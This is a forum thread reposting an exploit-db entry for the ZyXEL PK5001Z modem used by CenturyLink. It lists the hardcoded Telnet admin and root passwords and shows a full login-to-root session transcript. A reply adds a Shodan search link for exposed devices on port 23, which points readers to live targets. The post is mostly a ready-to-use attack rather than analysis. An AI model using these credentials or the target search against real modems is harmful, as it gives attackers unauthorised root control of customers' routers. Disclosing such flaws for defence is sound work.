Active Members Fi8sVrs Posted November 2, 2017 Active Members Report Posted November 2, 2017 # Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password. # Google Dork: n/a # Date: 2017-10-31 # Exploit Author: Matthew Sheimo # Vendor Homepage: https://www.zyxel.com/ # Software Link: n/a # Version: PK5001Z 2.6.20.19 # Tested on: Linux # About: ZyXEL PK5001Z Modem is used by Century Link a global communications and IT services company focused on connecting its customers to the power of the digital world. # Linked CVE's: CVE-2016-10401 Hardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet username: admin password: CenturyL1nk Escalate to root with 'su' and this password. password: zyad5001 [root:/]# telnet 192.168.0.1 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. PK5001Z login: admin Password: CenturyL1nk $ whoami admin_404A03Tel $ su Password: zyad5001 # whoami root # uname -a Linux PK5001Z 2.6.20.19 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown # cat /etc/zyfwinfo Vendor Name: ZyXEL Communications Corp. Source: https://www.exploit-db.com/exploits/43105/ Quote
pr00f Posted November 2, 2017 Report Posted November 2, 2017 https://www.shodan.io/search?query=PK5001Z+port%3A23 ¯\_(ツ)_/¯ 1 Quote